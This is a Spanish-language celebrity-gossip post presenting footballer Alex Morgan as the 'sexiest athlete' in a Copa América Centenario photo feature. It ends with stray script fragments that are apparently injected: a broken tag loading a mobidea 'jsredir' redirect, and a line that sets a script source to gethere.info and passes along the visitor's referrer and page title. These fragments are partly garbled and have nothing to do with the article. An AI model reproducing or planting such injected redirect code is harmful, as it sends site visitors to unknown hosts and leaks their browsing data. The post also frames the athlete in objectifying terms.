#CopaWTFAméricaCentenario: El 11 ideal de Estados Unidos con las mejores 11 fotos Alex Morgan

En WTF Online México celebraremos la Copa América Centenario a nuestra manera, con las mejores #WTFChicas que engalanarán la #CopaWTFAméricaCentenario y ver quién es el país campeón con las chicas más guapas del continente.

Esta vez iniciamos el previo del Grupo A, conformado por Estados Unidos, Colombia, Costa Rica y Paraguay. Con la representante del equipo de las barras y las estrellas: Estados Unidos.

Alex Morgan, campeona mundial de fútbol y medalla de oro en los Juegos Olímpicos, fue elegida por la  marca de lencería norteamericana Victoria´s Secret como la atleta más sexy del mundo.

La bella futbolista, titular indiscutible de la selección estadounidense, triunfa dentro y fuera del terreno de juego y no solo ha superado a gimnastas, tenistas y jugadoras de voleivol, sino que en la lista, titulada “What is sexy?” aparecían nombres de actrices y celebrities como Jennifer López o Kylie Jenner.

Morgan, que se consagró de forma definitiva en los Juegos de Londres de 2012, donde Estados Unidos se colgó el oro tras ganar a Japón en la final, es todo un icono mediático en su país.

No te decimos más, te dejamos el 11 ideal de fotos de la bella Alex Morgan

< src="http://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|||
Comentarios